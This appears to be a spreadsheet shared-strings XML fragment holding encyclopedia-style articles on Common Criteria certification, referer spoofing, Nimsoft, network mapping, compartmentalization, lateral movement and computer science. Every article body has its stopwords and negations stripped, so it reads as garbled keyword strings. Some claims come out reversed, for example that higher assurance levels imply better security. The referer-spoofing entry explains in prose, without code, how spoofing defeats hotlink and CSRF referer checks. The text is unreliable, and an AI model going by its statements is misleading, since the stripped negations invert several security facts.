    <t>common criteria information technology security evaluation (referred common criteria international standard (iso/iec 15408) computer security certification. currently version revision 5.common criteria framework computer system users specify security functional assurance requirements (sfrs sars respectively) security target (st), taken protection profiles (pps). vendors implement make claims security attributes products, testing laboratories evaluate products determine actually meet claims. words, common criteria provides assurance process specification, implementation evaluation computer security product conducted rigorous standard repeatable manner level commensurate target environment use. common criteria maintains list certified products, including operating systems, access control systems, databases, management systems. concepts common criteria evaluations performed computer security products systems. target evaluation (toe) product system subject evaluation. evaluation serves validate claims made target. practical use, evaluation must verify target's security features. this done following: protection profile (pp) document, typically created user user community, identifies security requirements class security devices (for example, smart cards used provide digital signatures, network firewalls) relevant user particular purpose. product vendors choose implement products comply pps, products evaluated pps. case, serve template product's (security target, defined below), authors least ensure requirements relevant also appear target's document. customers looking particular types products focus certified meets requirements. security target (st) document identifies security properties target evaluation. claim conformance pps. evaluated sfrs (security functional requirements. again, below) established less. this allows vendors tailor evaluation accurately match intended capabilities product. this means network firewall meet functional requirements database management system, different firewalls fact evaluated completely different lists requirements. usually published potential customers determine specific security features certified evaluation. security functional requirements (sfrs) specify individual security functions provided product. common criteria presents standard catalogue functions. example, state user acting particular role might authenticated. list sfrs vary evaluation next, even targets type product. although common criteria prescribe sfrs included identifies dependencies correct operation function (such ability limit access according roles) dependent another (such ability identify individual roles).the evaluation process also tries establish level confidence placed product's security features quality assurance processes: security assurance requirements (sars) descriptions measures taken development evaluation product assure compliance claimed security functionality. example, evaluation require source code kept change management system, full functional testing performed. common criteria provides catalogue these, requirements vary evaluation next. requirements particular targets types products documented respectively. evaluation assurance level (eal) numerical rating describing depth rigor evaluation. each corresponds package security assurance requirements (sars, above) covers complete development product, given level strictness. common criteria lists seven levels, basic (and therefore cheapest implement evaluate) stringent (and expensive). normally, author select assurance requirements individually choose packages, possibly 'augmenting' requirements areas requirements higher level. higher eals necessarily imply "better security", mean claimed security assurance extensively verified.so far, evaluated sts/certified products components (e.g., firewalls, operating systems, smart cards). common criteria certification sometimes specified procurement. other standards containing, e.g., interoperation, system management, user training, supplement product standards. examples include iso/iec 27002 german baseline protection. details cryptographic implementation within outside scope instead, national standards, like fips 140-2, give specifications cryptographic modules, various standards specify cryptographic algorithms use. more recently, authors including cryptographic requirements evaluations would typically covered fips 140-2 evaluations, broadening bounds scheme-specific interpretations. some national evaluation schemes phasing eal-based evaluations accept products evaluation claim strict conformance approved united states currently allows pp-based evaluations. canada process phasing eal-based evaluations. history originated three standards: itsec european standard, developed early 1990s france, germany, netherlands unification earlier work, approaches (the cesg evaluation scheme aimed defence/intelligence market green book aimed commercial use), adopted countries, e.g. australia. ctcpec canadian standard followed standard, avoided several problems used jointly evaluators u.s. canada. ctcpec standard first published 1993. tcsec united states department defense 5200.28 std, called orange book parts rainbow series. orange book originated computer security work including anderson report, done national security agency national bureau standards (the eventually became nist) late 1970s early 1980s. central thesis orange book follows work done dave bell lapadula protection mechanisms.cc produced unifying pre-existing standards, predominantly companies selling computer products government market (mainly defence intelligence use) would need evaluated standards. developed governments canada, france, germany, netherlands, u.s. testing organizations testing laboratories must comply iso/iec 17025, certification bodies normally approved iso/iec 17065. compliance iso/iec 17025 typically demonstrated national approval authority: canada, standards council canada (scc) program accreditation laboratories (palcan) accredits common criteria evaluation facilities (ccef) france, comité français d'accréditation (cofrac) accredits common criteria evaluation facilities, commonly called centre d'évaluation sécurité technologies l'information (cesti). evaluations done according norms standards specified agence nationale sécurité systèmes d'information (anssi). italy, ocsi (organismo certificazione della sicurezza informatica accredits common criteria evaluation laboratories india, stqc directorate ministry electronics information technology evaluates certifies products assurance levels eal4. united kingdom accreditation service (ukas) used accredit commercial evaluation facilities (clef); since 2019 consumer ecosystem national institute standards technology (nist) national voluntary laboratory accreditation program (nvlap) accredits common criteria testing laboratories (cctl) germany, bundesamt sicherheit informationstechnik (bsi) spain, national cryptologic center (ccn) accredits common criteria testing laboratories operating spanish scheme. netherlands, netherlands scheme certification area security (nscib) accredits security evaluation facilities (itsef). sweden, swedish certification body security (csec) licenses security evaluation facilities (itsef).characteristics organizations examined presented iccc mutual recognition arrangement well common criteria standard, also sub-treaty level common criteria (mutual recognition arrangement), whereby party thereto recognizes evaluations common criteria standard done parties. originally signed 1998 canada, france, germany, united kingdom united states, australia zealand joined 1999, followed finland, greece, israel, italy, netherlands, norway spain 2000. arrangement since renamed common criteria recognition arrangement (ccra) membership continues expand. within ccra evaluations mutually recognized (including augmentation flaw remediation). european countries within former itsec agreement typically recognize higher eals well. evaluations eal5 tend involve security requirements host nation's government. september 2012, majority members ccra produced vision statement whereby mutual recognition evaluated products lowered (including augmentation flaw remediation). further, vision indicates move away assurance levels altogether evaluations confined conformance protection profiles stated assurance level. this achieved technical working groups developing worldwide pps, transition period fully determined. july 2014, ccra ratified goals outlined within 2012 vision statement. major changes arrangement include: recognition evaluations collaborative protection profile (cpp) evaluation assurance levels alc_flr. emergence international technical communities (itc), groups technical experts charged creation cpps. transition plan previous ccra, including recognition certificates issued previous version arrangement. issues requirements common criteria generic; directly provide list product security requirements features specific (classes products: follows approach taken itsec, source debate used prescriptive approach earlier standards tcsec fips 140-2. value certification common criteria certification cannot guarantee security, ensure claims security attributes evaluated product independently verified. words, products evaluated common criteria standard exhibit clear chain evidence process specification, implementation, evaluation conducted rigorous standard manner. various microsoft windows versions, including windows server 2003 windows certified, security patches address security vulnerabilities still getting published microsoft windows systems. this possible process obtaining common criteria certification allows vendor restrict analysis certain security features make certain assumptions operating environment strength threats faced product environment. additionally, recognizes need limit scope evaluation order provide cost-effective useful security certifications, evaluated products examined level detail specified assurance level evaluations activities therefore performed certain depth, time, resources offer reasonable assurance intended environment. microsoft case, assumptions include a.peer: "any systems communicates assumed management control operate security policy constraints. applicable networked distributed environments entire network operates constraints resides within single management domain. there security requirements address need trust external systems communications links systems." this assumption contained controlled access protection profile (capp) products adhere. based assumptions, realistic common general-purpose operating systems, claimed security functions windows products evaluated. thus considered secure assumed, specified circumstances, also known evaluated configuration. whether microsoft windows precise evaluated configuration not, apply microsoft's security patches vulnerabilities windows continue appear. security vulnerabilities exploitable product's evaluated configuration, product's common criteria certification voluntarily withdrawn vendor. alternatively, vendor re-evaluate product include application patches security vulnerabilities within evaluated configuration. failure vendor take either steps would result involuntary withdrawal product's certification certification body country product evaluated. certified microsoft windows versions remain eal4+ without including application microsoft security vulnerability patches evaluated configuration. this shows limitation strength evaluated configuration. criticisms august 2007, government computing news (gcn) columnist william jackson critically examined common criteria methodology implementation common criteria evaluation validation scheme (ccevs). column executives security industry, researchers, representatives national information assurance partnership (niap) interviewed. objections outlined article include: evaluation costly process (often measured hundreds thousands dollars) vendor's return investment necessarily secure product. evaluation focuses primarily assessing evaluation documentation, actual security, technical correctness merits product itself. u.s. evaluations, eal5 higher experts national security agency participate analysis; eal7 full source code analysis required. effort time necessary prepare evaluation evidence evaluation-related documentation cumbersome time work completed, product evaluation generally obsolete. industry input, including organizations common criteria vendor's forum, generally little impact process whole.in 2006 research paper, computer specialist david wheeler suggested common criteria process discriminates free open-source software (foss)-centric organizations development models. common criteria assurance requirements tend inspired traditional waterfall software development methodology. contrast, much foss software produced using modern agile paradigms. although argued paradigms align well, others attempted reconcile paradigms. political scientist kallberg raised concerns lack control actual production products certified, absence permanently staffed organizational body monitors compliance, idea trust common criteria it-security certifications maintained across geopolitical boundaries.in 2017, roca vulnerability found list common criteria certified smart card products. vulnerability highlighted several shortcomings common criteria certification scheme: vulnerability resided homegrown generation algorithm published analyzed cryptanalysis community. however, testing labaratory informationstechnik gmbh (tüvit) germany approved certification body germany issued common criteria certificates vulnerable products. security target evaluated product claimed keys generated according standard algorithm. response vulnerability, plans improve transparency requiring certification report least specifies implemented proprietary cryptography exactly conformant recommended standard. plan requiring proprietary algorithm published way. even though certification bodies aware security claims specified common criteria certificates hold anymore, neither anssi revoked corresponding certificates. according bsi, certificate withdrawn issued misconception, e.g., turns wrong evidence submitted. after certificate issued, must presumed validity certificate decreases time improved attacks discovered. certification bodies issue maintenance reports even perform re-certification product. these activities, however, initiated sponsored vendor. while several common criteria certified products affected roca flaw, vendors' responses context certification different. products maintenance report issued, states keys length 3072 3584 bits security level least bits, products maintenance report mention change affects certified cryptographic security functionality, concludes change level guidance documentation effect assurance. according bsi, users certified products informed roca vulnerability vendors. this information, however, reach timely manner estonian authorities deployed vulnerable product 750,000 estonian identity cards. alternative approaches throughout lifetime universally adopted even creator nations, with, particular, cryptographic approvals handled separately, canadian implementation fips-140, cesg assisted products scheme (caps) also produced number alternative schemes timescales, costs overheads mutual recognition found impeding operation market: cesg system evaluation (sysn) fast track approach (fta) schemes assurance government systems rather generic products services, merged cesg tailored assurance service (ctas) cesg claims tested mark (cct mark), aimed handling less exhaustive assurance requirements products services cost time efficient mannerin early 2011, nsa/css published paper chris salter, proposed protection profile oriented approach towards evaluation. approach, communities interest form around technology types turn develop protection profiles define evaluation methodology technology type. objective robust evaluation. there concern negative impact mutual recognition.in sept 2012, common criteria published vision statement implementing large extent chris salter's thoughts previous year. elements vision included: technical communities focused authoring protection profiles (pp) support goal reasonable, comparable, reproducible cost-effective evaluation results evaluations done pp's possible; mutual recognition security target evaluations would limited eal2 also bell-lapadula model china compulsory certificate evaluation assurance level fips 140-2 information assurance 9241 iso/iec 27001 usability testing verification validation references external links official website common criteria project common criteria standard documents list common criteria evaluated products list licensed common criteria laboratories towards agile security assurance important common criteria acronyms common criteria users forum additional common criteria information google knol opencc project free apache license docs, templates tools common criteria quick reference card common criteria process cheatsheet common criteria process timeline</t>
  </si>
  <si>
    <t>Referer spoofing</t>
  </si>
  <si>
    <t>http networking, typically world wide web, referer spoofing (based canonised misspelling "referrer") sends incorrect referer information http request order prevent website obtaining accurate data identity page previously visited user. overview referer spoofing typically done data privacy reasons, testing, order request information (without genuine authority) servers supply response requests specific http referers. improve privacy, individual browser users replace accurate referer data inaccurate data, though many simply suppress browser's sending referer data. sending referrer information technically spoofing, though sometimes also described such. software, systems networks testing, sometimes penetration testing, referer spoofing often part larger procedure transmitting accurate inaccurate well expected unexpected input httpd system tested observing results.while many websites configured gather referer information serve different content depending referer information obtained, exclusively relying http referer information authentication authorization purposes genuine computer security measure. http referer information freely alterable interceptable, password, though poorly configured systems treat such. application some websites, especially many image hosting sites, referer information secure materials: browsers arriving pages served images. additionally site want users click pages advertisements directly able access downloadable file using referring page referring site information help site redirect unauthorized users landing page site would like use. attackers acquire knowledge approved referers, often trivial many sites follow common template, information combined exploit gain access materials. spoofing often allows access site's content site's server configured block browsers send referer headers. website owners disallow hotlinking. also used defeat referer checking controls used mitigate cross-site request forgery attacks. tools several software tools exist facilitate referer spoofing browsers. some extensions popular browsers mozilla firefox internet explorer, provide facilities customise manage referrer urls website user visits. other tools include proxy servers, individual configures browser send http requests. proxy forwards different headers intended website, usually removing modifying referer header. such proxies also present privacy issues users, user's activity. also referrer spam kind spamming aimed search engines notes</t>
  </si>
  <si>
    <t>Nimsoft</t>
  </si>
  <si>
    <t>nimsoft independent company software vendor offered information technology (it) monitoring service desk products services. acquired inc. 2010, since october 2012 products integrated business. nimsoft brand still used nimsoft products monitor manage business services specific systems within infrastructure, including network components, servers, databases, applications, virtualized environments. with nimsoft products, customers monitor systems hosted internal data centers, well externally hosted environments, including software service (saas) cloud computing environments. history nimbus software founded oslo, norway, 1998 (not confused nimbus data). converse software, exclusive distributor nimbus software, founded silicon valley 2002. nimbus software converse software merged 2004 form nimsoft. gary read, founder distributor, appointed company's headquarters established silicon valley. 2007 10.3 million series round funding equity northzone ventures closed. nimsoft acquired indicative software april 2008 offer business service management established research development base fort collins, colorado. nimsoft received francisco business times 2008 "best place work award". nimsoft closed million funding round goldman sachs october 2008.in 2009 nimsoft acquired intellectual property assets cittio. product capabilities included network discovery, topology mapping, root cause analysis (rca) utilizing graph theory. that october nimsoft announced unified monitoring architecture monitor externally hosted systems services, including saas cloud computing-based infrastructures.in march 2010 inc. announced would acquire nimsoft $350 million. september 2010, nimsoft extended software support vblock products company.in april 2011, nimsoft announced unified manager, software combining monitoring service management. enhanced management support netapp storage announced june. acquired netherlands-based watchmouse july, software integrated nimsoft.nimsoft ceased exist independent operating unit within 2012, although products still offered brand name. references external links nimsoft unified monitoring site</t>
  </si>
  <si>
    <t>Comparison of power management software suites</t>
  </si>
  <si>
    <t>following tables compare technical information commercial power management software suites. please individual products' articles information. table includes systems widely used currently available. references</t>
  </si>
  <si>
    <t>Network mapping</t>
  </si>
  <si>
    <t>network mapping study physical connectivity networks e.g. internet. network mapping discovers devices network connectivity. confused network discovery network enumerating discovers devices network characteristics (operating system, open ports, listening network services, etc.). field automated network mapping taken greater importance networks become dynamic complex nature. large-scale mapping project images first attempts large scale internet produced internet mapping project appeared wired magazine. maps produced project based layer level connectivity internet (see model), different aspects internet structure also mapped. more recent efforts internet improved sophisticated methods, allowing make faster sensible maps. example effort opte project, attempting develop system capable mapping internet single day. "map internet project" maps billion internet locations cubes cyberspace. users urls cubes re-arrange objects map. early 2011 canadian based peer hosting created internet depicts graph 19,869 autonomous system nodes connected 44,344 connections. sizing layout autonomous systems calculated based eigenvector centrality, measure central network autonomous system graph theory used better understand maps internet help choose many ways visualize internet maps. some projects attempted incorporate geographical data internet maps (for example, draw locations routers nodes world), others concerned representing abstract structures internet, allocation, structure, purpose space. enterprise network mapping many organizations create network maps network system. these maps made manually using simple tools microsoft visio, mapping process simplified using tools integrate auto network discovery network mapping, example fabric platform. many vendors notable network mappers list enable customize maps include labels, un-discoverable items background images. sophisticated mapping used help visualize network understand relationships devices transport layers provide service. mostly, network scanners detect network components deliver list used creating charts maps using network mapping software. items bottlenecks root cause analysis easier spot using tools. there three main techniques used network mapping: snmp based approaches, active probing route analytics. snmp based approach retrieves data router switch mibs order build network map. active probing approach relies series traceroute-like probe packets order build network map. route analytics approach relies information routing protocols build network map. each three approaches advantages disadvantages methods use. internet mapping techniques there prominent techniques used today create internet maps. first works data plane internet called active probing. used infer internet topology based router adjacencies. second works control plane infers autonomous system connectivity based data. speaker sends 19-byte keep-alive messages every seconds maintain connection. active probing this technique relies traceroute-like probing address space. these probes report back forwarding paths destination address. combining paths infer router level topology given pop. active probing advantageous paths returned probes constitute actual forwarding path data takes networks. also likely find peering links isps. however, active probing requires massive amounts probes entire internet. likely infer false topologies load balancing routers routers multiple address aliases. decreased global support enhanced probing mechanisms source-route probing, icmp echo broadcasting, address resolution techniques leaves type probing realm network diagnosis. path inference this technique relies various collectors collect routing updates tables provide information publicly. each entry contains path vector attribute called path. this path represents autonomous system forwarding path given origin given prefixes. these paths used infer as-level connectivity turn used build topology graphs. however, paths necessarily reflect data actually forwarded adjacencies nodes represent policy relationship them. single link reality several router links. also much harder infer peerings nodes peering relationships propagated isp's customer networks. nevertheless, support type mapping increasing isp's offer peer public route collectors route-views ripe. toolsets emerging cyclops netviews take advantage experimental collector bgpmon. netviews build topology maps seconds visualize topology changes moments occurring actual router. hence, routing dynamics visualized real time. comparison tools using bgpmon another tool nettransformer able discover generate peering maps either snmp polling converting dumps graphml file format. nettransformer allows also perform network diffs dumps thus reason peering evolved years. whatsup gold, monitoring tool, tracks networks, servers, applications, storage devices, virtual devices incorporates infrastructure management, application performance management. also comparison network diagram software opte project dimes webometrics network topology idea networking notes external links cheleby internet topology mapping system center applied internet data analysis netviews: multi-level realtime internet mapping cyclops: level observatory dimes research project internet mapping research project opte project</t>
  </si>
  <si>
    <t>Compartmentalization (information security)</t>
  </si>
  <si>
    <t>compartmentalization, information security, whether public private, limiting access information persons entities need-to-know basis perform certain tasks. originated handling classified information military intelligence applications. dates back antiquity, successfully used keep secret greek fire.the basis compartmentalization idea that, fewer people know details mission task, risk likelihood information compromised fall hands opposition decreased. hence, varying levels clearance within organizations exist. yet, even someone highest clearance, certain "compartmentalized" information, identified codewords referring particular types secret information, still restricted certain operators, even lower overall security clearance. information marked said codeword–classified. famous example ultra secret, documents marked "top secret ultra": "top secret" marked security level, "ultra" keyword restricted readership cleared read "ultra" documents.compartmentalization also used commercial security engineering technique protect information medical records. example example compartmentalization manhattan project. personnel ridge constructed operated centrifuges isolate uranium-235 naturally occurring uranium, know exactly doing. those knew know parts weapon separately designed teams know parts interacted. also information sensitivity principle least privilege read sensitive compartmented information references</t>
  </si>
  <si>
    <t>Network Lateral Movement</t>
  </si>
  <si>
    <t>network lateral movement, simply lateral movement, refers techniques cyber attackers, threat actors, progressively move network search data assets ultimately target attack campaigns. while development sophisticated sequences attack helped threat actors develop better strategies evade detection compared past, similar planning heist, cyber defenders also learned lateral movement attackers detect location respond effectively attack. references</t>
  </si>
  <si>
    <t>Computer science</t>
  </si>
  <si>
    <t>computer science study computation, automation, information. computer science spans theoretical disciplines (such algorithms, theory computation, information theory, automation) practical disciplines (including design implementation hardware software). computer science generally considered area academic research distinct computer programming.algorithms data structures central computer science. theory computation concerns abstract models computation general classes problems solved using them. fields cryptography computer security involve studying means secure communication preventing security vulnerabilities. computer graphics computational geometry address generation images. programming language theory considers different ways describe computational processes, database theory concerns management repositories data. human–computer interaction investigates interfaces humans computers interact, software engineering focuses design principles behind developing software. areas operating systems, networks embedded systems investigate principles design behind complex systems. computer architecture describes construction computer components computer-operated equipment. artificial intelligence machine learning synthesize goal-orientated processes problem-solving, decision-making, environmental adaptation, planning learning found humans animals. within artificial intelligence, computer vision aims understand process image video data, natural language processing aims understand process textual linguistic data. fundamental concern computer science determining cannot automated. turing award generally recognized highest distinction computer science. history earliest foundations would become computer science predate invention modern digital computer. machines calculating fixed numerical tasks abacus existed since antiquity, aiding computations multiplication division. algorithms performing computations existed since antiquity, even development sophisticated computing equipment.wilhelm schickard designed constructed first working mechanical calculator 1623. 1673, gottfried leibniz demonstrated digital mechanical calculator, called stepped reckoner. leibniz considered first computer scientist information theorist, various reasons, including fact documented binary number system. 1820, thomas colmar launched mechanical calculator industry invented simplified arithmometer, first calculating machine strong enough reliable enough used daily office environment. charles babbage started design first automatic mechanical calculator, difference engine, 1822, eventually gave idea first programmable mechanical calculator, analytical engine. started developing machine 1834, less years, sketched many salient features modern computer". crucial step adoption punched card system derived jacquard loom" making infinitely programmable. 1843, translation french article analytical engine, lovelace wrote, many notes included, algorithm compute bernoulli numbers, considered first published algorithm ever specifically tailored implementation computer. around 1885, herman hollerith invented tabulator, used punched cards process statistical information; eventually company became part ibm. following babbage, although unaware earlier work, percy ludgate 1909 published designs mechanical analytical engines history. 1937, hundred years babbage's impossible dream, howard aiken convinced ibm, making kinds punched card equipment also calculator business develop giant programmable calculator, ascc/harvard mark based babbage's analytical engine, used cards central computing unit. when machine finished, hailed "babbage's dream come true". during 1940s, development powerful computing machines atanasoff–berry computer eniac, term computer came refer machines rather human predecessors. became clear computers could used mathematical calculations, field computer science broadened study computation general. 1945, founded watson scientific computing laboratory columbia university york city. renovated fraternity house manhattan's west side ibm's first laboratory devoted pure science. forerunner ibm's research division, today operates research facilities around world. ultimately, close relationship columbia university instrumental emergence scientific discipline, columbia offering first academic-credit courses computer science 1946. computer science began established distinct academic discipline 1950s early 1960s. world's first computer science degree program, cambridge diploma computer science, began university cambridge computer laboratory 1953. first computer science department united states formed purdue university 1962. since practical computers became available, many applications computing become distinct areas study rights. etymology although first proposed 1956, term "computer science" appears 1959 article communications acm, louis fein argues creation graduate school computer sciences analogous creation harvard business school 1921. louis justifies name arguing that, like management science, subject applied interdisciplinary nature, characteristics typical academic discipline. efforts, others numerical analyst george forsythe, rewarded: universities went create departments, starting purdue 1962. despite name, significant amount computer science involve study computers themselves. because this, several alternative names proposed. certain departments major universities prefer term computing science, emphasize precisely difference. danish scientist peter naur suggested term datalogy, reflect fact scientific discipline revolves around data data treatment, necessarily involving computers. first scientific institution term department datalogy university copenhagen, founded 1969, peter naur first professor datalogy. term used mainly scandinavian countries. alternative term, also proposed naur, data science; used multi-disciplinary field data analysis, including statistics databases. early days computing, number terms practitioners field computing suggested communications acm—turingineer, turologist, flow-charts-man, applied meta-mathematician, applied epistemologist. three months later journal, comptologist suggested, followed next year hypologist. term computics also suggested. europe, terms derived contracted translations expression "automatic information" (e.g. "informazione automatica" italian) "information mathematics" often used, e.g. informatique (french), informatik (german), informatica (italian, dutch), informática (spanish, portuguese), informatika (slavic languages hungarian) pliroforiki (πληροφορική, means informatics) greek. similar words also adopted school informatics, university edinburgh). u.s., however, informatics linked applied computing, computing context another domain."a folkloric quotation, often attributed to—but almost certainly first formulated by—edsger dijkstra, states "computer science computers astronomy telescopes." design deployment computers computer systems generally considered province disciplines computer science. example, study computer hardware usually considered part computer engineering, study commercial computer systems deployment often called information technology information systems. however, exchange ideas various computer-related disciplines. computer science research also often intersects disciplines, cognitive science, linguistics, mathematics, physics, biology, earth science, statistics, philosophy, logic. computer science considered much closer relationship mathematics many scientific disciplines, observers saying computing mathematical science. early computer science strongly influenced work mathematicians kurt gödel, alan turing, john neumann, rózsa péter alonzo church continues useful interchange ideas fields areas mathematical logic, category theory, domain theory, algebra.the relationship computer science software engineering contentious issue, muddied disputes term "software engineering" means, computer science defined. david parnas, taking relationship engineering science disciplines, claimed principal focus computer science studying properties computation general, principal focus software engineering design specific computations achieve practical goals, making separate complementary disciplines.the academic, political, funding aspects computer science tend depend whether department formed mathematical emphasis engineering emphasis. computer science departments mathematics emphasis numerical orientation consider alignment computational science. both types departments tend make efforts bridge field educationally across research. philosophy epistemology computer science despite word "science" name, debate whether computer science discipline science, mathematics, engineering. allen newell herbert simon argued 1975, computer science empirical discipline. would called experimental science, like astronomy, economics, geology, unique forms observation experience narrow stereotype experimental method. nonetheless, experiments. each machine built experiment. actually constructing machine poses question nature; listen answer observing machine operation analyzing analytical measurement means available. since argued computer science classified empirical science since makes empirical testing evaluate correctness programs, problem remains defining laws theorems computer science exist) defining nature experiments computer science. proponents classifying computer science engineering discipline argue reliability computational systems investigated bridges civil engineering airplanes aerospace engineering. they also argue empirical sciences observe presently exists, computer science observes possible exist scientists discover laws observation, proper laws found computer science instead concerned creating phenomena.proponents classifying computer science mathematical discipline argue computer programs physical realizations mathematical entities programs deductively reasoned mathematical formal methods. computer scientists edsger dijkstra tony hoare regard instructions computer programs mathematical sentences interpret formal semantics programming languages mathematical axiomatic systems. paradigms computer science number computer scientists argued distinction three separate paradigms computer science. peter wegner argued paradigms science, technology, mathematics. peter denning's working group argued theory, abstraction (modeling), design. amnon eden described "rationalist paradigm" (which treats computer science branch mathematics, prevalent theoretical computer science, mainly employs deductive reasoning), "technocratic paradigm" (which might found engineering approaches, prominently software engineering), "scientific paradigm" (which approaches computer-related artifacts empirical perspective natural sciences, identifiable branches artificial intelligence). computer science focuses methods involved design, specification, programming, verification, implementation testing human-made computing systems. fields computer science computers astronomy telescopes. discipline, computer science spans range topics theoretical studies algorithms limits computation practical issues implementing computing systems hardware software.csab, formerly called computing sciences accreditation board—which made representatives association computing machinery (acm), ieee computer society (ieee cs)—identifies four areas considers crucial discipline computer science: theory computation, algorithms data structures, programming methodology languages, computer elements architecture. addition four areas, csab also identifies fields software engineering, artificial intelligence, computer networking communication, database systems, parallel computation, distributed computation, human–computer interaction, computer graphics, operating systems, numerical symbolic computation important areas computer science. theoretical computer science theoretical computer science mathematical abstract spirit, derives motivation practical everyday computation. understand nature computation and, consequence understanding, provide efficient methodologies. theory computation according peter denning, fundamental question underlying computer science "what automated?" theory computation focused answering fundamental questions computed amount resources required perform computations. effort answer first question, computability theory examines computational problems solvable various theoretical models computation. second question addressed computational complexity theory, studies time space costs associated different approaches solving multitude computational problems. famous problem, millennium prize problems, open problem theory computation. information coding theory information theory, closely related probability statistics, related quantification information. this developed claude shannon find fundamental limits signal processing operations compressing data reliably storing communicating data. coding theory study properties codes (systems converting information form another) fitness specific application. codes used data compression, cryptography, error detection correction, recently also network coding. codes studied purpose designing efficient reliable data transmission methods. data structures algorithms data structures algorithms studies commonly used computational methods computational efficiency. programming language theory formal methods programming language theory branch computer science deals design, implementation, analysis, characterization, classification programming languages individual features. falls within discipline computer science, depending affecting mathematics, software engineering, linguistics. active research area, numerous dedicated academic journals. formal methods particular kind mathematically based technique specification, development verification software hardware systems. formal methods software hardware design motivated expectation that, engineering disciplines, performing appropriate mathematical analysis contribute reliability robustness design. they form important theoretical underpinning software engineering, especially safety security involved. formal methods useful adjunct software testing since help avoid errors also give framework testing. industrial use, tool support required. however, high cost using formal methods means usually used development high-integrity life-critical systems, safety security utmost importance. formal methods best described application fairly broad variety theoretical computer science fundamentals, particular logic calculi, formal languages, automata theory, program semantics, also type systems algebraic data types problems software hardware specification verification. computer systems computational processes artificial intelligence artificial intelligence (ai) aims required synthesize goal-orientated processes problem-solving, decision-making, environmental adaptation, learning, communication found humans animals. from origins cybernetics dartmouth conference (1956), artificial intelligence research necessarily cross-disciplinary, drawing areas expertise applied mathematics, symbolic logic, semiotics, electrical engineering, philosophy mind, neurophysiology, social intelligence. associated popular mind robotic development, main field practical application embedded component areas software development, require computational understanding. starting point late 1940s alan turing's question "can computers think?", question remains effectively unanswered, although turing test still used assess computer output scale human intelligence. automation evaluative predictive tasks increasingly successful substitute human monitoring intervention domains computer application involving complex real-world data. computer architecture organization computer architecture, digital computer organization, conceptual design fundamental operational structure computer system. focuses largely central processing unit performs internally accesses addresses memory. computer engineers study computational logic design computer hardware, individual processor components, microcontrollers, personal computers supercomputers embedded systems. term “architecture” computer literature traced work lyle johnson frederick brooks, jr., members machine organization department ibm's main research center 1959. concurrent, parallel distributed computing concurrency property systems several computations executing simultaneously, potentially interacting other. number mathematical models developed general concurrent computation including petri nets, process calculi parallel random access machine model. when multiple computers connected network using concurrency, known distributed system. computers within distributed system private memory, information exchanged achieve common goals. computer networks this branch computer science aims manage networks computers worldwide. computer security cryptography computer security branch computer technology objective protecting information unauthorized access, disruption, modification maintaining accessibility usability system intended users. historical cryptography writing deciphering secret messages. modern cryptography scientific study problems relating distributed computations attacked. technologies studied modern cryptography include symmetric asymmetric encryption, digital signatures, cryptographic hash functions, key-agreement protocols, blockchain, zero-knowledge proofs, garbled circuits. databases data mining database intended organize, store, retrieve large amounts data easily. digital databases managed using database management systems store, create, maintain, search data, database models query languages. data mining process discovering patterns large data sets. computer graphics visualization computer graphics study digital visual contents involves synthesis manipulation image data. study connected many fields computer science, including computer vision, image processing, computational geometry, heavily applied fields special effects video games. image sound processing information take form images, sound, video multimedia. bits information streamed signals. processing central notion informatics, european view computing, studies information processing algorithms independently type information carrier whether electrical, mechanical biological. this field plays important role information theory, telecommunications, information engineering applications medical image computing speech synthesis, among others. what lower bound complexity fast fourier transform algorithms? unsolved problems theoretical computer science. applied computer science computational science, finance engineering scientific computing computational science) field study concerned constructing mathematical models quantitative analysis techniques using computers analyze solve scientific problems. major usage scientific computing simulation various processes, including computational fluid dynamics, physical, electrical, electronic systems circuits, well societies social situations (notably games) along habitats, among many others. modern computers enable optimization designs complete aircraft. notable electrical electronic circuit design spice, well software physical realization modified) designs. latter includes essential design software integrated circuits. social computing human–computer interaction social computing area concerned intersection social behavior computational systems. human–computer interaction research develops theories, principles, guidelines user interface designers. software engineering software engineering study designing, implementing, modifying software order ensure high quality, affordable, maintainable, fast build. systematic approach software design, involving application engineering practices software. software engineering deals organizing analyzing software—it deal creation manufacture software, internal arrangement maintenance. example software testing, systems engineering, technical debt software development processes. discoveries philosopher computing bill rapaport noted three great insights computer science: gottfried wilhelm leibniz's, george boole's, alan turing's, claude shannon's, samuel morse's insight: objects computer deal order represent "anything".all information computable problem represented using bistable pair flip-flop easily distinguishable states, "on/off", "magnetized/de-magnetized", "high-voltage/low-voltage", etc.). alan turing's insight: five actions computer perform order "anything".every algorithm expressed language computer consisting five basic instructions:move left location; move right location; read symbol current location; print current location; print current location. corrado böhm giuseppe jacopini's insight: three ways combining actions (into complex ones) needed order computer "anything".only three rules needed combine basic instructions complex ones: sequence: first this, that; selection: such-and-such case, then this, else that; repetition: while such-and-such case, this. note three rules boehm's jacopini's insight simplified goto (which means elementary structured programming). programming paradigms programming languages used accomplish different tasks different ways. common programming paradigms include: functional programming, style building structure elements computer programs treats computation evaluation mathematical functions avoids state mutable data. declarative programming paradigm, means programming done expressions declarations instead statements. imperative programming, programming paradigm uses statements change program's state. much imperative mood natural languages expresses commands, imperative program consists commands computer perform. imperative programming focuses describing program operates. object-oriented programming, programming paradigm based concept "objects", contain data, form fields, often known attributes; code, form procedures, often known methods. feature objects object's procedures access often modify data fields object associated. thus object-oriented computer programs made objects interact another. service-oriented programming, programming paradigm uses "services" unit computer work, design implement integrated business applications mission critical software programsmany languages offer support multiple paradigms, making distinction matter style technical capabilities. research conferences important events computer science research. during conferences, researchers public private sectors present recent work meet. unlike academic fields, computer science, prestige conference papers greater journal publications. proposed explanation quick development relatively field requires rapid review distribution results, task better handled conferences journals. education computer science, known near synonyms, computing, computer studies, taught schools since days batch processing, mark sensitive cards paper tape usually select students. 1981, produced micro-computer classroom network computer studies became common level students (11–16-year-old), computer science level students. importance recognised, became compulsory part national curriculum, stage september 2014 became entitlement pupils 4.in 14,000 school districts deciding curriculum, provision fractured. according 2010 report association computing machinery (acm) computer science teachers association (csta), states adopted significant education standards high school computer science. according 2021 report, high schools offer computer science.israel, zealand, south korea included computer science national secondary education curricula, several others following. also notes references further reading external links computer science curlie scholarly societies computer science archived june 2011, wayback machine what computer science? best papers awards computer science since 1996 photographs computer scientists bertrand meyer eecs.berkeley.edu bibliography academic search engines citeseerx (article): search engine, digital library repository scientific academic papers focus computer information science. dblp computer science bibliography (article): computer science bibliography website hosted universität trier, germany. collection computer science bibliographies (collection computer science bibliographies) professional organizations association computing machinery ieee computer society informatics europe aaai aaas computer science misc computer science—stack exchange: community-run question-and-answer site computer science what computer science archived february 2015, wayback machine computer science science? computer science (software) must considered independent discipline.</t>
  </si>
  <si>
